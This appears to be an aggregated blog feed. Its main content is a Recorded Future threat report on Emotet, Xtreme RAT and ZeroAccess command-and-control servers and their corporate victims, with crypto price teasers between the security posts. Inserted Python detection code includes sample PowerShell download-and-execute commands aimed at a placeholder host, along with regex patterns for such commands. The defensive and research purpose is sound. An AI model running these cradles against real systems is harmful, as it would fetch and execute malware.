| CVE-2018-4878 | Adobe | Flash Player | Fallout Exploit Kit, GreenFlash Exploit Kit, Hermes Ransomware, Sundown Exploit Kit, Threadkit Exploit Kit | 7.5 | 89 |
| CVE-2017-11882 | Microsoft | Office | AgentTesla, Andromeda, BONDUPDATER, HAWKEYE, LCG Kit, Loki, POWRUNNER, QuasarRAT, REMCOS RAT, ThreadKit Exploit Kit | 9.3 | 99 |
| CVE-2017-8750 | Microsoft | Office | Formbook, Loki, QuasarRAT | 7.6 | 89 |
| CVE-2017-0199 | Microsoft | Office | DMShell++, njRAT, Pony, QuasarRAT, REMCOS RAT, SHUTTERSPEED, Silent Doc Exploit Kit, Threadkit Exploit Kit | 9.3 | 99 |
| CVE-2016-0189 | Microsoft | Internet Explorer | Grandsoft Exploit Kit, KaiXin Exploit Kit, Magnitude Exploit Kit, RIG Exploit Kit, Underminer Exploit Kit | 7.6 | 89 |
| CVE-2017-8570 | Microsoft | Office | Formbook, QuasarRAT, Sisfader RAT, Threadkit Exploit Kit, Trickbot | 9.3 | 99 |
| CVE-2018-8373 | Microsoft | Internet Explorer | Quasar RAT | 7.6 | 89 |
| CVE-2012-0158 | Microsoft | Office | Silent Doc Exploit, PlugX | 9.3 | 89 |
| CVE-2015-1805 | Google | Android | AndroRAT | 7.2 | 89 |

Development of Exploit Kits Continues to Decrease

As observed in prior reports, the development of new exploit kits continued to decrease. Only five new exploit kits emerged in 2018, compared with 10 in 2017 and 62 in 2016. Of those five, two were associated with a top 10 vulnerability: Fallout and LCG Kit. Starting in March, LCG Kit incorporated CVE-2017-11882, and later that year it also incorporated 2018’s top vulnerability, CVE-2018-8174. Although LCG Kit has been associated with a number of malicious attachments, including ones spreading RATs such as REMCOS and QuasarRAT, there were no direct references to this exploit kit for sale on the dark web in 2018 under the LCG Kit name. New exploit kits developed in 2018 include:

  • Best Pack Exploit Kit
  • Creep Exploit Kit
  • Darknet Angler
  • Fallout Exploit Kit
  • LCG Kit

Exploit Kits That Continued to Make Their Mark

Among exploit kits associated with the top vulnerabilities, ThreadKit was the most discussed on dark web sources in 2018. ThreadKit incorporated four of the top 10 vulnerabilities (CVE-2018-4878, CVE-2017-11882, CVE-2017-0199, and CVE-2017-8570). ThreadKit’s notoriety increased when the Cobalt Hacking Group (or Cobalt Group) added another stage to the macro exploit by including its signature CobInt trojan. The group typically attacks financial institutions, although the group’s activity has lessened due to the arrests of some of its members.

[Figure: Dark web discussion of exploits associated with 2018’s top vulnerabilities.]

In 2018, ThreadKit was last updated on December 28 by mrbass, a user on a dark web forum, to include vulnerability CVE-2018-15982 (a more recent Adobe zero-day vulnerability), which continued to be sold for $400, as seen below.

[Figure: Last update in 2018 for the ThreadKit exploit kit by mrbass on a dark web forum.]

UnderMiner, which exploited two of 2018’s top vulnerabilities — CVE-2016-0189 and CVE-2018-4878 — made a resurgence in the latter part of 2018. Like ThreadKit, UnderMiner took advantage of, and was the first to exploit, the zero-day vulnerability CVE-2018-15982 in late December 2018.

RATs in Focus

Sisfader is the only RAT that first emerged in 2018 and was associated with a top vulnerability, with its exploit of CVE-2017-8570. The RAT maintains persistence by installing itself as a service when launched from malicious RTF files. According to available sources, there was no evidence of Sisfader for sale.

| RAT | Cyber Vulnerability Count |
| --- | --- |
| QuasarRAT | 5 |
| njRAT | 1 |
| PlugX | 1 |
| AndroRAT | 1 |

QuasarRAT was associated with the most vulnerabilities, including, most notably, those in Trillium’s Security Multisploit Tool. This RAT, which has been active since 2011, continues to show its viability in a variety of attacks, including spearphishing attacks on government organizations.

Outlook and Recommended Actions

Official vulnerability databases, and even scanning tools, cannot arm organizations with one key metric: the overlap between the vulnerabilities in the systems you use and the ones that are being actively exploited by threat actors. The goal of this annual list is to provide an account of the most widely adopted vulnerability exploits, in addition to some recommended actions:

  • Prioritize patching of all the vulnerabilities identified in this post.
  • Do not forget to patch older vulnerabilities — the average vulnerability stays alive for nearly seven years.
  • Remove the affected software if it does not impact key business processes.
  • Consider Google Chrome as a primary browser.
  • While Flash Player is being phased out and an increasing number of sites have removed the technology, continue to exercise caution with websites that have not.
  • Utilize browser ad-blockers to prevent exploitation via malvertising.
  • Frequently back up systems, particularly those with shared files, which are regular ransomware targets.
  • Users and organizations should conduct or maintain phishing security awareness training to mitigate attacks.
  • Companies should deliver user training to encourage skepticism of emails requesting additional information or prompting clicks on any links or attachments. Companies will not generally ask customers for personal or financial data, but when in doubt, contact the company directly by phone and confirm if they actually need the information.

The post Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 appeared first on Recorded Future.


Monero Price Analysis: Despite Greater Support, XMR Price is Struggling to Break Free

XMR/USD has been stuck trading within the confinements of a horizontal wedge pattern formation since early December 2018. Trezor, the crypto-security hard wallet provider, announced its upcoming […]

The post Monero Price Analysis: Despite Greater Support, XMR Price is Struggling to Break Free appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Jumps 10% as IBM Launches Stellar-Powered World Wire Platform

XLM/USD late on Monday was holding double-digit gains, as the price broke down a significant barrier of resistance. Information technology giant IBM has launched the World Wire […]

The post Stellar Price Analysis: XLM/USD Jumps 10% as IBM Launches Stellar-Powered World Wire Platform appeared first on Hacked: Hacking Finance.

Dash Price Analysis: The Technology and Its Cryptocurrency that Keeps Bringing Real-World Value Use Cases

Dash Text launched a new service initially piloting in Venezuela for donation payment in DASH without the requirement of the internet. DASH/USDT has a significant barrier ahead […]

The post Dash Price Analysis: The Technology and Its Cryptocurrency that Keeps Bringing Real-World Value Use Cases appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD Heading for a Big Bullish Retest after Escaping Descending Wedge Pattern

The Tron (TRX) price is cooling, with eyes on a retest of a breached wedge pattern structure. TRX/USD could see a very fast return to the $0.030000 price […]

The post Tron Price Analysis: TRX/USD Heading for a Big Bullish Retest after Escaping Descending Wedge Pattern appeared first on Hacked: Hacking Finance.

IOTA Runs Into Familiar Resistance but Outlook Brightens on Geo-Tag Transaction Proposal

IOTA (MIOTA) ran into familiar resistance on Sunday, as the bulls failed to break through a known area of supply that has thwarted the last two major […]

The post IOTA Runs Into Familiar Resistance but Outlook Brightens on Geo-Tag Transaction Proposal appeared first on Hacked: Hacking Finance.

The Satoshis Have Aligned: Historical Crypto Chart Suggests Bitcoin Has Already Bottomed

Nobody really needs to be told that the general sentiment surrounding the cryptocurrency market right now is very much of the bullish persuasion. Now bear in mind […]

The post The Satoshis Have Aligned: Historical Crypto Chart Suggests Bitcoin Has Already Bottomed appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD is Free to Run Wild Following Triangular Structure Escape

XRP/USD is running at two sessions in the green, as the bulls escape from a triangular pattern structure. The supply zone is tracking from the $0.3300-$0.3500 price […]

The post XRP Price Analysis: XRP/USD is Free to Run Wild Following Triangular Structure Escape appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: Bulls Enjoy Explosive Breakout as Hoskinson Teases ADA-Supported Ledger Wallet

The Cardano (ADA/USDT) price is elevated thanks to another wave of buying pressure out from a bullish pennant pattern. Cardano’s community has much to be excited about […]

The post Cardano Price Analysis: Bulls Enjoy Explosive Breakout as Hoskinson Teases ADA-Supported Ledger Wallet appeared first on Hacked: Hacking Finance.

NEM Price Analysis: The Foundation and XEM are on a Strong Road to Recovery

NEM (XEM/USDT) has jumped a chunky 18% over the last four sessions of consecutive gains. The NEM community is very much optimistic about the organization’s restructuring plan. […]

The post NEM Price Analysis: The Foundation and XEM are on a Strong Road to Recovery appeared first on Hacked: Hacking Finance.

Talking to RATs: Assessing Corporate Risk by Analyzing Remote Access Trojan Infections

Insikt Group

Click here to download the complete analysis as a PDF.

Recorded Future analyzed network communications relating to a selection of RAT command-and-control servers across several malware families in order to profile targeted victim organizations and sectors. This report is based on data sourced from the Recorded FutureⓇ Platform, VirusTotal, Farsight DNS, Shodan, GreyNoise, and other OSINT techniques.

This report will be of most value to network defenders and corporate risk professionals within companies concerned about the risk posed by their third-party supply chain. To learn more about how to leverage Recorded Future for monitoring and investigating third-party risk, read about our new Third-Party Risk offering. This assessment takes advantage of the data behind our new network traffic analysis risk rules for third-party risk to generate actionable insights.

Executive Summary

Remote access trojans (RATs) on a corporate system may serve as a key pivot point to access information laterally within an enterprise network. By analyzing network metadata, Recorded Future analysts were able to identify RAT command-and-control (C2) servers, and more crucially, which corporate networks were communicating to those controllers. This approach allows Recorded Future to provide insight about third-party organizations that our clients may rely upon, enabling a better understanding of potential third-party risk to their own data.

Insikt Group used the joint Recorded Future and Shodan Malware Hunter project and the Recorded Future Platform to identify active malware controllers for 14 malware families between December 2, 2018 and January 9, 2019. We then focused our analysis on a subset of malware — Emotet, Xtreme RAT, and ZeroAccess — to profile RAT communications from third-party organizations to the controllers.

Key Judgments

  • The majority of Emotet controllers resolved to IPs in Latin American countries.
  • A significant proportion of infected Emotet hosts were based in Latin America, corroborating community observations of a surge in late-2018 Emotet activity targeting South American entities. Infected hosts include organizations in the automotive, finance, energy, construction, retail and entertainment, logistics, and technology sectors.
  • Infected Xtreme RAT hosts were identified within:
    • A video game company and a utilities company in Europe
    • Middle Eastern, South Asian, and East Asian telecommunications companies
    • An industrial conglomerate and an IT company in East Asia



Public and private organizations all over the world continue to experience digital intrusions, with news of large breaches being almost a daily occurrence. In its 2018 annual review, the U.K.’s NCSC reported that it had directly handled 557 incidents between September 1, 2017 and August 31, 2018, highlighting the scale of the problem in the U.K. alone.

Often, attacks utilize RATs, which enable attackers to illicitly gain control of a host device. RATs are feature-rich software generally used by adversaries to conduct activity such as keylogging, file extraction, recording host audio and video, and more.

A significant proportion of these attacks are carried out using commodity RATs, such as DarkTrack RAT, Xtreme RAT, or ZeroAccess, with attacker motivations ranging from financial gain to gaining credibility within hacking communities. Many hacking forum administrators will stipulate that new members provide evidence of their “ability” in order to be accepted into the forum, so the relatively low-level technical knowledge required to use commodity RATs, along with extensive online documentation, makes them a highly attractive proposition for inexperienced hackers.

At the other end of the spectrum are state-backed advanced persistent threat (APT) groups and advanced criminal groups, who may conduct malware campaigns with greater sophistication in order to achieve their operational outcomes. APTs continue to use RATs because they are easy to configure, modify, and use. This, combined with their relative effectiveness against antivirus software and their potential for hindering attribution by “hiding in the noise,” ensures that RATs continue to be used by APTs and cybercriminals alike.

Cybercriminals have often been forced to innovate in developing tooling and malware to support their usually financially motivated objectives. As RATs and other malware used by cybercriminals are disrupted by law enforcement action or their methods are neutered by coordinated industry initiatives, a change in methodology or even business model is sometimes forced. This has been the case with the actors behind Emotet.

Emotet has evolved from a banking trojan targeting European banking customers to a modularized malware deployment platform with several high-profile campaigns noted in 2018. Emotet, as a self-propagating trojan, is a particularly virulent piece of malware that exhibits network worm-like characteristics, enabling it to build up a considerable botnet of infected victims.

Analytic Approach

Recorded Future researchers identified a variety of RAT and Emotet controllers derived from threat lists in the Recorded Future platform and used network metadata to identify victim communications with the RAT C2 IPs. The threat lists included data from:

  1. Recorded Future’s jointly developed Malware Hunter capability with Shodan
  2. The Feodo malware family (also known as Dridex or Emotet/Heodo) blocklist

Editor’s Note: Due to technological limitations of the collection mechanism, the number of C2s identified using Malware Hunter is not reflective of the true number of C2s present globally for each analyzed malware family in this research. Therefore, this analysis is focused on the methodology of identifying infected clients using Recorded Future to inform third-party risk.

For the purposes of our research, we searched for active controllers in the December 2, 2018 to January 8, 2019 time frame for the following malware families:

  • Bozok RAT
  • Nanocore
  • PoisonIvy
  • Cafeini
  • NetBus
  • ProRAT
  • DarkComet
  • njRAT
  • Xtreme RAT
  • DarkTrack RAT
  • Nuclear RAT
  • ZeroAccess
  • Emotet
  • Orcus RAT

We then analyzed network communications for a subset of these controllers from victim organizations. Filtering was conducted to avoid identifying organizations that provide internet hosting services to other organizations as being directly victimized, and internet scanners were omitted where identifiable. This analysis is based upon the observation of connections made in a specific manner to servers identified as malicious, and the possibility exists that researchers or others that are not in fact victims have made such connections.
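The correlation step described above (known controllers matched against observed connections, with hosting providers and internet scanners filtered out before an organization is called a victim) can be reproduced over a plain flow export. The following is an added example in Python, not Recorded Future’s code; it assumes each flow record carries the owning organization and a coarse organization type, uses the defanged C2 addresses printed in this report, and constructs every source address and organization name.

```python
"""Correlate network metadata with RAT/Emotet C2 indicators.

Added example, not Recorded Future's code. It assumes flow-style records
(source, destination, owning organisation, organisation type) such as a
SIEM or NetFlow collector would export, and a C2 list written in the
defanged form the report uses ("115.88.75[.]245"). The C2 addresses are
the ones named in the report; every source address and organisation in
SAMPLE_FLOWS is constructed (RFC 5737 documentation ranges).
"""
from collections import defaultdict
from dataclasses import dataclass
import ipaddress

# C2 indicators exactly as the report prints them (defanged).
EMOTET_C2 = ["115.88.75[.]245", "192.155.90[.]90", "45.123.3[.]54"]
XTREME_RAT_C2 = ["196.200.160[.]201", "116.62.60[.]109",
                 "192.240.110[.]98", "198.255.100[.]74"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a normal IPv4 literal and
    validate it; a mistyped indicator raises ValueError instead of
    silently never matching anything."""
    ip = indicator.replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")
    return str(ipaddress.IPv4Address(ip))


# Lookup table: refanged C2 address -> malware family.
C2_FAMILY = {refang(i): "Emotet" for i in EMOTET_C2}
C2_FAMILY.update({refang(i): "Xtreme RAT" for i in XTREME_RAT_C2})


@dataclass(frozen=True)
class Flow:
    src: str       # client address observed connecting out
    dst: str       # remote address it connected to
    org: str       # organisation the client address resolves to
    org_type: str  # "enterprise", "hosting" or "scanner"


def probable_infections(flows, c2_family=C2_FAMILY):
    """Map organisation -> family -> sorted client IPs that contacted a
    known C2. Hosting providers are dropped because the victim is their
    customer, not them, and known scanners are dropped because they talk
    to C2s deliberately; both exclusions mirror the report's filtering."""
    hits = defaultdict(lambda: defaultdict(set))
    for f in flows:
        family = c2_family.get(f.dst)
        if family is None or f.org_type != "enterprise":
            continue
        hits[f.org][family].add(f.src)
    return {org: {fam: sorted(ips) for fam, ips in fams.items()}
            for org, fams in hits.items()}


def rank_c2s(flows, c2_family=C2_FAMILY):
    """Rank controllers by the number of distinct enterprise organisations
    seen talking to them (the report's measure of how active a C2 is)."""
    orgs = defaultdict(set)
    for f in flows:
        if f.dst in c2_family and f.org_type == "enterprise":
            orgs[f.dst].add(f.org)
    return sorted(((ip, len(o)) for ip, o in orgs.items()),
                  key=lambda item: (-item[1], item[0]))


# Constructed sample: two hosts at one bank, three other enterprises, a
# hosting provider and a scanner, plus one flow to a non-C2 address.
SAMPLE_FLOWS = [
    Flow("192.0.2.10", "115.88.75.245", "Bank of Example (MX)", "enterprise"),
    Flow("192.0.2.11", "115.88.75.245", "Bank of Example (MX)", "enterprise"),
    Flow("198.51.100.5", "115.88.75.245", "Example Medical Devices (CA)", "enterprise"),
    Flow("203.0.113.7", "45.123.3.54", "Example Energy (AT)", "enterprise"),
    Flow("203.0.113.99", "196.200.160.201", "Example IT Services (JP)", "enterprise"),
    Flow("198.51.100.200", "115.88.75.245", "Example Hosting Ltd", "hosting"),
    Flow("203.0.113.250", "192.155.90.90", "Example Internet Scanner", "scanner"),
    Flow("192.0.2.50", "203.0.113.1", "Bank of Example (MX)", "enterprise"),
]

if __name__ == "__main__":
    for org, fams in probable_infections(SAMPLE_FLOWS).items():
        for fam, ips in fams.items():
            print(f"{org}: {fam} on {', '.join(ips)}")
    print("most active C2s:", rank_c2s(SAMPLE_FLOWS))
```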

[Figure: Breakdown of active C2s per malware family identified (total sample size of C2s detected: 481).]

We focused our analysis on Emotet, Xtreme RAT, and ZeroAccess controllers to profile RAT communications with probable infected hosts within commercial organizations’ infrastructure.

Recorded Future’s Third-Party Risk Module

Following the launch of Recorded Future’s Third-Party Risk module, we have integrated additional features that will enable enterprises to assess cyber risk posed by companies in their supply chain, partners, and themselves. Third-Party Risk enables you to monitor your third-party ecosystem’s health, investigate risks posed by companies, and alert on changes in the threat environments of companies of interest to you. The analysis in this report was conducted using the same data sources we are using to inform third-party risk factors and metrics in our new module, especially our network traffic analysis risk rules.

[Figure: Global distribution of RAT C2s identified using Recorded Future and Shodan’s Malware Hunter project and the Feodo blocklist. (Source: Recorded Future)]

Threat Analysis


Emotet is an advanced, modular banking trojan that primarily functions as a downloader or dropper of other banking trojans. Emotet was initially designed to steal financial data; however, it is now mostly used as a downloader for other malware such as Trickbot and Qakbot. Emotet uses C2 servers to receive updates as well as to download and install additional malware. Emotet operators tend not to be selective about industry or region, instead spreading indiscriminately, which suggests that they are more interested in large volumes of infection to generate profit.

Emotet was originally identified as a new banking trojan in 2014, and is often referred to as Geodo or Feodo. The malware was the product of natural evolution from the Feodo (sometimes called Cridex or Bugat) banking trojan, which spawned other offspring. In the past 12 months, however, it evolved from a standalone threat into a distributor of other trojans, with numerous large campaigns taking place over the summer of 2018. The malware is unique in that it employs a litany of open source libraries and code, enough to title a folder in its code directory as “Open Source.” A number of Emotet modules incorporate utilities developed by Nirsoft to scrape and gather passwords on the victim machine.

Emotet has recently been acting as a spam-sending malware that infects target systems to then load other malware families onto the host. The infected hosts that distribute spam and occasionally act as proxies for the C2 servers are a decentralized network, making it difficult for defenders to block at their perimeter.

Reporting has revealed that the operators of Emotet are likely maintaining at least two Emotet infrastructure setups in parallel, likely to aid redundancy and to make it harder for coordinated takedown by law enforcement.

Emotet: Evaluating Third-Party Risk Using Network Metadata

During our research, we identified 26 organizations with hosts infected with Emotet. These organizations were spread across a variety of industries, including:

  • Automotive
  • Finance and banking
  • Energy
  • Medical device manufacturing
  • Construction
  • Retail and entertainment
  • Logistics, commercial services, and supplies
  • IT
  • Utilities


The chart above shows us the breakdown of infected hosts communicating with identified Emotet controllers. Two controllers stand out, with over 40 infected hosts observed communicating with them: South Korean IP 115.88.75[.]245 and U.S. IP 192.155.90[.]90.


[Table: Emotet C2s identified with active corporate victim infections between December 2, 2018 and January 8, 2019.]

The table above identifies the IP address, country, and internet service provider (ISP) of each Emotet C2 server analyzed in depth by Recorded Future.

Editor’s Note: ISPs provide internet access to customers, and may not be directly in control of the equipment and systems in use at any specific IP address within a netblock assigned to the ISP.

One of the most active Emotet C2s, based on the number of unique corporate victims communicating with it in our research data, was South Korean IP 115.88.75[.]245. Based on our new algorithm, which has been developed into a risk rule for clients using the Recorded Future platform, IP addresses resolving to at least four different infected companies were detected communicating with the C2. Three of the infected companies were located in Latin America, which has recently experienced a surge in Emotet infections due to a slightly modified Emotet propagation methodology being employed. Two of the detected victims were financial companies in Mexico and Ecuador, with the third being a Chilean industrial conglomerate. The remaining corporate victim was a Canadian medical device manufacturing company.

The South Korean C2 IP did not have a domain resolving to it at the time of this research, but VirusTotal data indicates that connections with the IP address, explicitly noted as the host in the URL, were made to it from infected victims. We identified several malicious Microsoft Word documents containing obfuscated VBA code as macros designed to launch PowerShell, which in turn would retrieve and run an Emotet payload from the South Korean C2.
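The delivery chain just described (Word document, obfuscated macro, PowerShell retrieving the payload from the C2) leaves a characteristic trace in process-creation telemetry: an Office binary as the parent of a shell whose command line, once any -EncodedCommand blob is decoded, contains a download primitive. The following detection is an added example in Python, not Recorded Future’s code; it assumes Sysmon-style event fields (Computer, ParentImage, Image, CommandLine), and every sample event is constructed.

```python
"""Flag the Office -> macro -> PowerShell -> payload-download chain that the
report describes for Emotet, in endpoint process-creation telemetry.

Added example, not Recorded Future's code. It assumes Sysmon-style
process-creation events flattened to dicts with 'Computer', 'ParentImage',
'Image' and 'CommandLine' fields. Every event in SAMPLE_EVENTS is
constructed; the URLs use the reserved .invalid TLD.
"""
import base64
import re
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}

# Download-and-execute primitives typically found in macro-launched PowerShell.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
    r"start-bitstransfer|\biwr\b|\biex\b|invoke-expression|frombase64string)",
    re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the
# common ones and capture the base64 blob that follows.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or
    None when the flag is absent or the blob does not decode cleanly."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Optional[dict]:
    """Return a finding when an Office process spawns a shell: 'high'
    severity when the (decoded) command line contains a download cradle,
    'medium' when Office merely spawned a shell. None for anything else."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Search the command line with the base64 blob swapped for its decoded text.
    searchable = cmdline if decoded is None else ENC_FLAG_RE.sub(" ", cmdline) + "\n" + decoded
    indicators = sorted({m.lower() for m in CRADLE_RE.findall(searchable)})
    return {"host": event.get("Computer", "?"), "parent": parent, "child": child,
            "encoded": decoded is not None, "indicators": indicators,
            "severity": "high" if indicators else "medium"}


def scan(events):
    """Run assess() over a batch and keep only the findings."""
    return [finding for finding in map(assess, events) if finding]


def encode_command(ps: str) -> str:
    """Encode text the way -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: an encoded cradle, a plain script launch, a benign
# admin command from Explorer, and an Excel -> cmd -> PowerShell chain.
SAMPLE_EVENTS = [
    {"Computer": "WS-FIN-01", "ParentImage": WINWORD, "Image": POWERSHELL,
     "CommandLine": "powershell -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/e')")},
    {"Computer": "WS-HR-07", "ParentImage": WINWORD, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Temp\\report.ps1"},
    {"Computer": "WS-DEV-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": POWERSHELL, "CommandLine": "powershell -enc " + encode_command("Get-Process")},
    {"Computer": "WS-FIN-02", "ParentImage": EXCEL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://c2.invalid/p','%TEMP%\\p.exe')\""},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```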

[Figure: Clustering of Emotet C2s and communicating victim organizations detected using Recorded Future third-party risk analytics and network traffic analysis risk rules.]

Further analysis of the Emotet C2s and the victim organization IPs revealed several distinct groupings of activity, as shown in the Maltego graph above. The highly active South Korean C2 detailed previously, resolving to LG DACOM Corporation, sat within a highly interconnected cluster of activity shown on the left-hand side of the graph. This cluster centered on 17 detected Emotet C2s mostly hosted on infrastructure resolving to telecommunications service providers and hosting providers based in Latin America. The targeted organizations in this cluster were based around the world, with a significant proportion of victim organizations in Latin America and Europe.

[Figure: Primary cluster of Emotet activity with the majority of C2s located in the Latin American IP space.]

The second largest cluster of activity we observed centered on an Emotet controller hosted on Indian IP 45.123.3[.]54, which resolved to Blue Lotus Support Services in India. The C2 hostname pointing to this IP was […][.]in, which corresponds to the Marian International Institute of Management, a university in Kerala, India. Our analysis revealed ongoing Emotet infections pertaining to this C2 at the following companies:

  • A Japanese machine manufacturer
  • A Chinese technology conglomerate
  • An Ecuadorian bank and a U.S. financial consulting firm
  • An Austrian energy supplier
  • Canadian and Australian cable TV providers

Xtreme RAT

Xtreme RAT is a commodity RAT that was first publicly sighted in 2010. The RAT is available for free and its source code has been leaked, enabling attackers to modify it freely to evade network defenses. Although it has been around for almost a decade and usage appears to be lower than in previous years, it is still a potent trojan that has been widely reported as being used in targeted attacks and cybercrime activity. This RAT utilizes a client-server system that the author defined in a reverse of the usual scheme. The “server” part of the malware is installed on the victim’s computer, and the victim’s “server” thus connects to the “client,” which is in reality a controller operated on one or more remote C2 systems.

[Figure: Recorded Future heatmap showing Xtreme RAT controllers active during the research period as detected using the Recorded Future and Shodan Malware Hunter project. (Source: Recorded Future)]

Xtreme RAT: Evaluating Third-Party Risk Using Network Metadata

We deployed our new Third-Party Risk module to identify communication nodes with active Xtreme RAT controllers that we observed between December 8, 2018 and January 2, 2019. Once again, we found corporate IPs communicating with the Xtreme RAT controllers in a manner that indicated probable infection.

| Xtreme RAT C2 IP | Country | Registrant/Organization |
| --- | --- | --- |
| 101.132.69[.]78 | China | Hangzhou Alibaba Advertising Co.,Ltd. |
| 116.62.60[.]109 | China | Hangzhou Alibaba Advertising Co.,Ltd. |
| 212.46.104[.]104 | Germany | HKN GmbH |
| 196.200.160[.]201 | Morocco | CNRST (Centre National pour la Recherche Scientifique et Technique) |
| 198.255.100[.]74 | United States | FDCServers |
| 192.240.110[.]98 | United States | FDCServers |

Three unique victims were found communicating with a Moroccan Xtreme RAT C2 hosted on 196.200.160[.]201, which resolved to hostname […]. The IP is registered to the Centre National pour la Recherche Scientifique et Technique (CNRST), a technical university in Rabat, Morocco. Two of the infected victim devices resolved to infrastructure belonging to U.S. and Japanese multinational IT equipment and services companies. The third victim was a device located at a Brazilian university.

[Figure: Xtreme RAT controller hosted on a Moroccan university network.]

Hostname test.zzjzpt[.]com was updated to point at Chinese IP 116.62.60[.]109 on December 16, 2018 and continued to resolve to that IP until at least January 5, 2019. In this time frame, the IP was designated as an Xtreme RAT C2. This controller, along with two other Xtreme RAT C2s hosted on U.S. FDCServers infrastructure (192.240.110[.]98 and 198.255.100[.]74), was observed receiving Xtreme RAT network communications from several infected hosts within a European utilities company. Additional victim organizations that were observed communicating with these Xtreme RAT C2s were:

  • A European video game company
  • Middle Eastern, South Asian, and East Asian telecommunications companies
  • An East Asian industrial conglomerate
  • An East Asian IT company

[Figure: Xtreme RAT controllers with overlapping organizational targeting.]

ZeroAccess Trojan

ZeroAccess was first discovered in 2011, and it utilizes an advanced rootkit to evade detection. As a trojan, it can create a hidden file system and backdoor on a host as well as facilitate the downloading of additional malware onto the host. ZeroAccess can be configured to make use of a domain generation algorithm (DGA) to discover and connect to its C2 servers and may also utilize peer-to-peer connectivity. Historically, ZeroAccess was deployed using strategic web compromises (SWC) and was typically used by cybercriminals in order to generate illicit funds through pay-per-click advertising mechanisms (click fraud). The malware has also been used to mine for cryptocurrency.

ZeroAccess: Evaluating Third-Party Risk Using Network Metadata

During our research period, we identified a single instance of a victim organization communicating with a ZeroAccess trojan C2 active on Romanian IP 31.5.229[.]224. The victim organization was an East Asian IT company.


Banking trojans like Emotet and other RATs continue to pose significant ongoing threats to government and company networks around the world. The developers behind Emotet continue to innovate and develop modularized functionality to aid propagation efficacy and evade traditional network defenses, resulting in widespread infections which, according to a US-CERT alert issued in July 2018, have cost state, local, tribal, and territorial (SLTT) governments up to $1 million per incident to remediate.

This research highlights the benefit of being able to identify and track malicious RAT controller network infrastructure to inform the security posture of your enterprise. Clients can use Recorded Future’s Third-Party Risk module by observing the related risk rules triggered within our platform. With Third-Party Risk, the same data we used to identify and analyze malware communications in this assessment triggers risk rules and raises an alert when a company in a client’s third-party risk watch list demonstrates similar activity.

Figure: Third-party risk network traffic analysis risk rule showing high-severity risk associated with Xtreme RAT communications observed on a company’s infrastructure.

As we continue to develop additional coverage of RAT controllers, we will automatically add these signatures so they trigger third-party risk rules in the Recorded Future platform when we observe corporate network infrastructure communicating with these controllers.

Network Defense Recommendations

Recorded Future recommends organizations conduct proactive threat hunting and implement the following mitigations when defending against illicit RAT activity:

  • Use Recorded Future’s API to import indicators listed in this report (Appendix A) into your endpoint detection and response (EDR) platform.
  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Monitor endpoint traffic to alert and block connections to indicators in Appendix A.

To view a full list of the associated indicators of compromise, download the appendix.

[1] For more detail on the capability, please refer to the Recorded Future white paper on proactive threat identification.

[2] Visual Basic for Applications is an implementation of Microsoft’s Visual Basic 6 programming language and is used in Microsoft Office products, such as Excel, to develop macros.

The post Talking to RATs: Assessing Corporate Risk by Analyzing Remote Access Trojan Infections appeared first on Recorded Future.


Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which has distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect grows larger and larger, we realized we needed an algorithmic method to assist in analyzing this information at scale, to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

